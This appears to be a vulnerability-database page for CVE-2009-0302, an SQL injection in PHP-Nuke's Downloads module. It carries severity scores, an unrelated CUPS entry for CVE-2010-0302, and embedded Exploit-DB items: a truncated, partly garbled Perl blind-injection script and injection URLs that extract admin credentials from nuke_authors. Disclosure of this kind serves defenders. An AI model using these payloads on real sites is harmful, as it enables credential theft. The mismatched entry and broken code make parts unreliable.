CVE-2009-0302
Published 2009-01-27
CVE-2009-0302: SQL injection vulnerability in the Downloads module for PHP-Nuke 8.0 8.1.0.3.5b and earlier allows remote authenticated users to execute arbitrary SQL commands…
Priority: P4 · 30 · medium
CVSS 2.0: 4.6 · AV:N/AC:H/Au:S/C:P/I:P/A:P
EXPLOIT
EPSS: 1.46% · 70.3th percentile
SQL injection vulnerability in the Downloads module for PHP-Nuke 8.0 8.1.0.3.5b and earlier allows remote authenticated users to execute arbitrary SQL commands via the url parameter in the Add operation to modules.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php-nuke | downloads_module | — | — |
CVSS provenance
nvd · v2.0 · 4.6 · MEDIUM · AV:N/AC:H/Au:S/C:P/I:P/A:P
vendor_redhat · 7.5 · HIGH
GHSA
GHSA-23xg-g252-mcgr: SQL injection vulnerability in the Downloads module for PHP-Nuke 8
ghsa_unreviewed·2022-05-02
CVE-2009-0302 [MEDIUM] CWE-89 GHSA-23xg-g252-mcgr: SQL injection vulnerability in the Downloads module for PHP-Nuke 8
Red Hat
cups Incomplete fix for CVE-2009-3553
vendor_redhat·2010-03-03·CVSS 7.5
CVE-2010-0302 [HIGH] cups Incomplete fix for CVE-2009-3553
Use-after-free vulnerability in the abstract file-descriptor handling interface in the cupsdDoSelect function in scheduler/select.c in the scheduler in cupsd in CUPS before 1.4.4, when kqueue or epoll is used, allows remote attackers to cause a denial of service (daemon crash or hang) via a client disconnection during listing of a large number of print jobs, related to improperly maintaining a reference count. NOTE: some of these details are obtained from third party information. NOTE: this vulnerability exists because of an incomplete fix for CVE-2009-3553.
No detection rules found.
Exploit-DB
PHP-Nuke 8.1.0.3.5b - 'Downloads' Blind SQL Injection
exploitdb·2011-11-23
CVE-2009-0302 PHP-Nuke 8.1.0.3.5b - 'Downloads' Blind SQL Injection
---
#!/usr/bin/perl
# [0-Day] PHP-Nuke new(POST => $HostName.'modules.php?name=Downloads&d_op=Add');
my $Cookies = new HTTP::Cookies;
my $UserAgent = new LWP::UserAgent(
agent => 'Mozilla/5.0',
max_redirect => 0,
cookie_jar => $Cookies,
default_headers => HTTP::Headers->new,
) or die $!;
my $WaRWolFz = "http://www.warwolfz.org/";
my $DefaultTime = request($WaRWolFz);
my $Post;
sub Blind_SQL_Jnjection {
my ($dec,$hex,$Victime) = @_;
return "http://www.warwolfz.org/' UNION/**/SELECT IF(SUBSTRING(pwd,${dec},1)=CHAR(${hex}),benchmark(250000000,CHAR(0)),0) FROM nuke_authors WHERE aid='${Victime}";
}
for(my $I=1; $I F
$Post = Blind_SQL_Jnjection($I,$chars[$J],$Victime);
$Time = request($Post);
sleep(3);
refresh($HostName, $DefaultTime, $c
Exploit-DB
PHP-Nuke Downloads Module - 'url' SQL Injection
exploitdb·2009-01-23
CVE-2009-0302 PHP-Nuke Downloads Module - 'url' SQL Injection
---
source: https://www.securityfocus.com/bid/33410/info
The Downloads module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Admin Username :
http://www.example.com/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&[email protected]&&url=0%2F*%00*/'%20OR%20ascii(substring((select+a
id+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
Admin Password :
http://www.example.com/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker
No writeups or analysis indexed.
http://1337day.com/exploits/15481
http://osvdb.org/51633
http://osvdb.org/77349
http://www.exploit-db.com/exploits/18148
http://www.securityfocus.com/archive/1/500335/100/0/threaded
http://www.securityfocus.com/bid/33410
http://www.securityfocus.com/bid/50770
https://exchange.xforce.ibmcloud.com/vulnerabilities/48186
https://exchange.xforce.ibmcloud.com/vulnerabilities/71475
Published: 2009-01-27